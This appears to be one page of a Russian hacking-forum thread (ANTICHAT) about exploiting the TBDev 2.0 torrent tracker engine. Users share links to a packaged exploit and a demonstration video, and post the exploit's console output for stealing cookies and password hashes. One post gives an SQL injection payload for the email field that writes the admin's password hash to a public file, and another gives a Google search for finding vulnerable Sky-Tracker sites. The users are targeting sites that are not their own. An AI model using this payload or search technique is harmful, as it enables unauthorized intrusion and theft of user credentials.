ANTICHAT
Страница 4 из 27 < 1 2 3 4 5 6 7 8 14 > Последняя »
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Трекер-движок TBDev 2.0 (https://forum.antichat.xyz/showthread.php?t=79705)

aka PSIH 09.12.2008 16:08
Цитата:
Сообщение от Qwazar
Ты уверен что у тебя прав хватает?
Errcode 2 означает что папка не существует(т.е путь не правильный)... ;)
Если прав не хватает то Errcode 13
;)
special for roa :p

Dimazzan 09.12.2008 16:21
Помогите с проблемой
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* -- @mail.ru'' at line 1

DIMON4G 09.12.2008 22:46
Цитата:
Сообщение от Витян
сделал видео _http://letitbit.net/download/262433962218/qwazar-sploit.rar.html
_http://rapidshare.com/files/165895736/qwazar_sploit.rar.html

Чтобы небыло вопросов, php из видео скачан отсюда _http://php.ru/download/php-5.2.1-Win32.zip
выложи видео пожалуйста на депоситфайлс.

Витян 10.12.2008 00:00
http://depositfiles.com/files/w2ggoxnsd

DIMON4G 10.12.2008 17:08
Витян эх, данное чудо уже не работает ((( больше никаких уязвимостей не знаешь (приват) :) ?

DIMON4G 10.12.2008 17:12
Цитата:
Сообщение от Uname-A
C:\php>php.exe sql.php http://adrez/ 1 123123123 123123
http://adrez/:123123123:123123
Trying to get your cookies... [DONE]
Trying to get passhash:
Exploit failed

Пробывал сайтах на 5 везде одно и тоже .. Кто может помоч?
+1 также, мож это всё лажа.... :(

Qwazar 10.12.2008 17:35
Цитата:
Сообщение от DIMON4G
+1 также, мож это всё лажа.... :(
Ну дык, сколько времени уже прошло, на сайте разработчика уже исправления для этой баги выложили.

Dimazzan 10.12.2008 18:14
Цитата:
в поле имейл пишем :' union select passhash from users where id=1 into outfile '../../../usr/local/www/torrent/torrents/images/1.txt'/* -- @ukrnet.ua

по адрессу h**p://сайт/torrents/images/1.txt смотрим хеш юзера с id=1
Эта штука не пашет!!!

Dimazzan 10.12.2008 18:15
Цитата:
+1 также, мож это всё лажа....
Эта штука еще актуально на Sky-Tracker

http://www.google.ru/search?hl=ru&q=Powered+by+Sky-Tracker&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2 +Google&lr=

holden321 13.12.2008 17:13
подскажите, зайдя на сайт как админ или сисоп я могу изменить файлы движковые или записать новые? хотябы в принципе это возможно или нет?
Sky-Tracker


Время: 10:31
Страница 4 из 27 < 1 2 3 4 5 6 7 8 14 > Последняя »
Показывать 40 сообщений этой темы на одной странице